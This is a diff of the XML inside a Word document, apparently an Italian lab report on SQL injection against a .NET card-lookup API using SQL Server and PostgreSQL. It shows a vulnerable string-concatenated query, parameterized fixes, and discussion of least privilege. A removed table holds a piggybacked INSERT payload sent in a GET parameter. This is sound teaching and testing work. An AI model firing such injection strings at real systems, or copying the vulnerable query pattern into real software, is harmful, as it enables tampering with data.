-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>appuser</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>--</w:t>
             </w:r>
@@ -7392,13 +6855,20 @@
               <w:jc w:val="left"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">Il secondo comando è particolare perché sfrutta la vulnerabilità </w:t>
@@ -7502,16 +6972,7 @@
         <w:spacing w:before="240" w:after="240"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Dopo aver portato con successo il nostro attacco, abbiamo cominciato a studiare le possibili contromisure. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Per neutralizzare gli attacchi descritti e garantire il ripristino dei requisiti CIA, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>siamo intervenuti</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> su due livelli: la </w:t>
+        <w:t xml:space="preserve">Dopo aver portato con successo il nostro attacco, abbiamo cominciato a studiare le possibili contromisure. Per neutralizzare gli attacchi descritti e garantire il ripristino dei requisiti CIA, siamo intervenuti su due livelli: la </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7753,11 +7214,13 @@
               <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>C#</w:t>
             </w:r>
@@ -7810,7 +7273,6 @@
               <w:t xml:space="preserve"> = new </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7824,15 +7286,7 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">query, connection)) </w:t>
+              <w:t xml:space="preserve">(query, connection)) </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7865,7 +7319,6 @@
               <w:t xml:space="preserve">    </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7874,7 +7327,6 @@
               <w:t>cmd.Parameters.AddWithValue</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7899,7 +7351,6 @@
               <w:t xml:space="preserve">", </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7908,7 +7359,6 @@
               <w:t>input.Username</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7933,7 +7383,6 @@
               <w:t xml:space="preserve">    </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7942,7 +7391,6 @@
               <w:t>cmd.Parameters.AddWithValue</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7951,7 +7399,6 @@
               <w:t xml:space="preserve">("@password", </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7960,7 +7407,6 @@
               <w:t>input.Password</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7985,7 +7431,6 @@
               <w:t xml:space="preserve">    using (var reader = await </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7994,7 +7439,6 @@
               <w:t>cmd.ExecuteReaderAsync</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8035,7 +7479,6 @@
               <w:t xml:space="preserve">        if (</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8044,39 +7487,13 @@
               <w:t>reader.HasRows</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">) </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>{ /</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>* Genera il Token JWT *</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/ }</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>) { /* Genera il Token JWT */ }</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -8096,14 +7513,7 @@
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
               </w:rPr>
-              <w:t xml:space="preserve">else </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t xml:space="preserve">{ </w:t>
+              <w:t xml:space="preserve">else { </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -8113,7 +7523,6 @@
               <w:t>return</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8121,7 +7530,6 @@
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8133,23 +7541,8 @@
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>)</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>; }</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>(); }</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -8186,13 +7579,7 @@
         <w:t>A questo punto,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>l</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">'iniezione del payload </w:t>
+        <w:t xml:space="preserve"> l'iniezione del payload </w:t>
       </w:r>
       <w:r>
         <w:t>“</w:t>
@@ -8240,10 +7627,7 @@
         <w:t>--”</w:t>
       </w:r>
       <w:r>
-        <w:t>. Il risultato è che l’autenticazione restituisce correttamente un 404</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>. Il risultato è che l’autenticazione restituisce correttamente un 404.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8334,7 +7718,6 @@
               <w:keepNext w:val="0"/>
               <w:keepLines w:val="0"/>
               <w:spacing w:before="240" w:line="278" w:lineRule="auto"/>
-              <w:outlineLvl w:val="3"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:i w:val="0"/>
@@ -8393,7 +7776,6 @@
             <w:bookmarkStart w:id="6" w:name="_gvszt0hrzwhe" w:colFirst="0" w:colLast="0"/>
             <w:bookmarkEnd w:id="6"/>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8402,7 +7784,6 @@
               <w:t>cmd.Parameters.AddWithValue</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8415,15 +7796,17 @@
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:bookmarkStart w:id="7" w:name="_3oq1ozl8vwc9" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Tuttavia, i</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">l database non capisce che </w:t>
+        <w:t xml:space="preserve">Tuttavia, il database non capisce che </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8519,10 +7902,7 @@
         <w:t>h</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> tornando così risultati errati</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve"> tornando così risultati errati. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8633,7 +8013,6 @@
               <w:keepNext w:val="0"/>
               <w:keepLines w:val="0"/>
               <w:spacing w:before="240" w:after="240" w:line="278" w:lineRule="auto"/>
-              <w:outlineLvl w:val="3"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
@@ -8651,37 +8030,7 @@
                 <w:color w:val="000000"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>S</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:i w:val="0"/>
-                <w:iCs w:val="0"/>
-                <w:color w:val="000000"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">tring query = </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:i w:val="0"/>
-                <w:iCs w:val="0"/>
-                <w:color w:val="000000"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:i w:val="0"/>
-                <w:iCs w:val="0"/>
-                <w:color w:val="000000"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>SELECT * FROM cards WHERE issuer LIKE '%" + text + "%'";</w:t>
+              <w:t>String query = "SELECT * FROM cards WHERE issuer LIKE '%" + text + "%'";</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8833,7 +8182,6 @@
               <w:t xml:space="preserve"> = new </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8847,15 +8195,7 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>query, connection))</w:t>
+              <w:t>(query, connection))</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8888,7 +8228,6 @@
               <w:t xml:space="preserve">  </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8897,7 +8236,6 @@
               <w:t>cmd.Parameters.AddWithValue</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8938,7 +8276,6 @@
               <w:t xml:space="preserve">  using (var reader = await </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8947,7 +8284,6 @@
               <w:t>cmd.ExecuteReaderAsync</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9040,24 +8376,13 @@
         <w:t xml:space="preserve"> queries</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">es. </w:t>
+        <w:t xml:space="preserve"> (es. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Roboto Mono"/>
         </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Roboto Mono"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">; </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9065,7 +8390,6 @@
         </w:rPr>
         <w:t>UPDATE...</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9076,14 +8400,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> DELETE...</w:t>
+        <w:t>; DELETE...</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">) o i tentativi di </w:t>
@@ -9116,10 +8433,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rinciple</w:t>
+        <w:t>Principle</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -9897,6 +9211,11 @@
       </w:tr>
     </w:tbl>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:bookmarkStart w:id="14" w:name="_e0v2tmvp6muj" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkStart w:id="15" w:name="_yr4zdpn5wczy" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkStart w:id="16" w:name="_2a1hemtr7974" w:colFirst="0" w:colLast="0"/>
@@ -9934,109 +9253,22 @@
       <w:r>
         <w:t xml:space="preserve"> replicati i medesimi payload di attacco volti all'inserimento di record arbitrari tramite l'endpoint vulnerabile</w:t>
       </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9016"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9016" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="240" w:after="240"/>
-              <w:rPr>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>GET /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/db2/cards/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>list?text</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=x'; INSERT INTO </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>public."Cards</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>" (number, issuer) VALUES ('7777', 'Hacker</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>')--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
     <w:p>
       <w:pPr>
         <w:spacing w:before="240" w:after="240"/>
       </w:pPr>
       <w:r>
-        <w:t>L'esito del test ha evidenziato un mutamento radicale nel comportamento del sistema, tracciabile tramite i registri d'errore dell'applicazione:</w:t>
+        <w:t>L'esito del test ha evidenziato un mutamento radicale nel comportamento del sistema, tracciabile tramite i registri d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">i </w:t>
+      </w:r>
+      <w:r>
+        <w:t>errore dell'applicazione:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10051,71 +9283,31 @@
       <w:r>
         <w:t xml:space="preserve">Comportamento di </w:t>
       </w:r>
+      <w:r>
+        <w:t>SQL Server</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>l DBMS ha</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> restituito i dati della query originale e non ha eseguito (o ha ignorato l’errore) della query passata tramite la tecnica del </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>PostgreSQL</w:t>
+        <w:t>piggybacking</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:t>l motore del DBMS ha intercettato il tentativo di INSERT da parte del modulo applicativo. Rilevando l'assenza dei privilegi necessari per l'</w:t>
-      </w:r>
-      <w:r>
-        <w:t>utente</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Postgres</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ha bloccato atomicamente l'intera transazione, restituendo il codice di errore nativo 42501: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>permission</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>denied</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> for </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>table</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ards. L'applicazione .NET ha intercettato l'eccezione SQL sollevando un codice HTTP 500 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Internal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Server Error.</w:t>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Il risultato è che nessun dato è stato alterato.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10124,7 +9316,86 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
-        <w:spacing w:after="240"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Comportamento di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PostgreSQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>l motore del DBMS ha intercettato il tentativo di INSERT da parte del modulo applicativo. Rilevando l'assenza dei privilegi necessari per l'</w:t>
+      </w:r>
+      <w:r>
+        <w:t>utente</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Postgres</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ha bloccato atomicamente l'intera transazione, restituendo il codice di errore nativo 42501: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>permission</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>denied</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>table</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
